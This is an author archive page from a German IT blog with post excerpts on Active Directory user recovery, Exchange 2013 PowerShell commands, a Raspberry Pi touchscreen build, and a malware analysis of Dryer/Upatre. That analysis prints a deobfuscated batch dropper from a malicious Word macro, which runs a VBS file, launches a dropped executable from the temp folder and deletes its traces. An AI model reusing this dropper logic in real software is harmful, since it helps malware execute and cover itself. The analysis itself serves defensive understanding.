Archiv für den Autor: Patrick

Über Patrick

Ich bin ein 24 jähriger, gelernter Informatiker mit einem Bachelor in Computer Science und System Engineer und Security Specialist für einen IT Provider.

Dryer / Upatre im Detail

Vor kurzem bin ich über eine Version vom Dryer beziehungsweise seinem Loader, genannt Upatre gestolpert und meine Analyse möchte ich euch nicht vorenthalten:

Aufbau

In einem ersten Schritt habe ich mich an eine detaillierte Analyse gemacht. Begonnen hat alles mit einem Mail mit Word und Makro im Anhang. Durch einen Dump konnte ich die folgenden Makros rausziehen und durch ein bisschen Reverse Engineering und Zusammensetzen auch die Verschleierungsversuche rückgängig machen:

– ThisDocument
– Module1
– Module2

Daraus entstehen dann die folgenden Scripts. Einerseits ein Batch-Script, Variante 1:

echo off
:pinkator
	ping 1.2.3.1 -n 2
	set ggtt="bs"

:lqwjdjqiw
:lwijdsji
	set trfd="%TMP%\"
	set nmsj="31166"
	set exds="8"

	cscript.exe %TMP%\31166.vbs
	ping 2.2.1.1 -n 2
																								
:windows
	%TMP%\8.exe
																								
:loop
	ping 1.3.1.2 -n 1
	set tar1="31166.bat"
	set stat="444.png"
	del %TMP%\3116.vbs
	del %TMPT\31166.bat
	del %TMP%\444.png
																								
	if exist %TMP%\31166.bat goto loop
	if exist %TMPT\31166.vbs goto loop
exit

Weiterlesen

Wiederherstellen von Benutzern aus dem AD

In der digitalen Welt ist das Löschen einfach geworden: Einmal nicht genau kontrolliert, einmal zuwenig nachgedacht und schon ist etwas gelöscht… Besonders in einem Active Directory kann das grosse Wellen schlagen, da ein Benutzer ziemlich bald danach nicht mehr arbeiten kann, da neben seinen Zugriffen auch sein Login verfällt!

Und da braucht es eine schnelle und einfache Variante zum Wiederherstellen. Im Rahmen einer Arbeit an der Fachhochschule, haben ein Kollege und ich ein Dokument verfasst, welches aufzeigt, wie in so einem Fall vorgegangen werden kann.

Zu finden ist die Arbeit hier.

Exchange 2013: Und plötzlich ging’s nicht mehr…

Exchange und vor allem das Administrieren von Exchange ist ja immer so ein Fall für sich, doch irgendwie kann ich einfach nicht nachvollziehen, wieso Microsoft mit jedem Update von Exchange immer wieder alles umstellen muss, an was man sich bisher ganz gut gewöhnt hat…

Genau so ist es beim Wechsel von 2008 auf 2013 auch wieder geschehen, denn plötzlich gibt es eine Webkonsole, genannt Exchange Admin Center statt der lokalen Konsole. Aus meiner Sicht eigentlich nicht die schlechteste Idee (Microsoft hatte schon dümmere Ideen). Doch wieso kann man nicht die selbe Funktionalität abbilden, wie in der lokalen Konsole – man weiss es nicht!

Somit entsteht bei mir eine kleine Liste, mit Powershell-Kommandos, welche früher mal über das die Konsole erledigt werden konnte.

So zum Beispiel das Setzen von Vollzugriff und Senden-Als auf eine Mailbox für eine DL:

Add-MailboxPermission -Identity ALIAS -User MAILBOX -AccessRights FullAccess
Add-ADPermission "DISPLAYNAME" -User MAILBOX -ExtendedRights "Send As"

Oder aber das Custom-Attribute setzen auf einer Verteilerliste:

Get-DistributionGroup VERTEILERLISTE | Set-DistributionGroup -CustomAttribute1 "WERT"

Bei mir eigentlich alltägliche Dinge und unter 2008 mal Standardfunktionen, mit 2013 plötzlich verschwunden…

Hack-In-A-Box mit PiTFT und Raspberry Pi

Mein Raspberry Pi lag lange Zeit rum und irgendwie wollte ich mal wieder etwas damit spielen und so habe ich mir ein 2.8 Zoll Touchscreen Display mit einer Auflösung von 320×240 geleistet, welches direkt auf den Pi aufgesteckt werden kann. Zusätzlich auch noch eine passende WLAN-Antenne und ein Gehäuse, soll ja auch nach etwas aussehen 😉

PiTFT

Da das Display bereits zusammengesetzt und funktionstüchtig geliefert wird, muss es nur noch angesteckt werden und los gehts. Dazu gibt es von Adafruit ein Image, welches auch gleich die nötigen Anpassungen mitbringt: Klick

Foto 13.11.14 21 54 41

Weiterlesen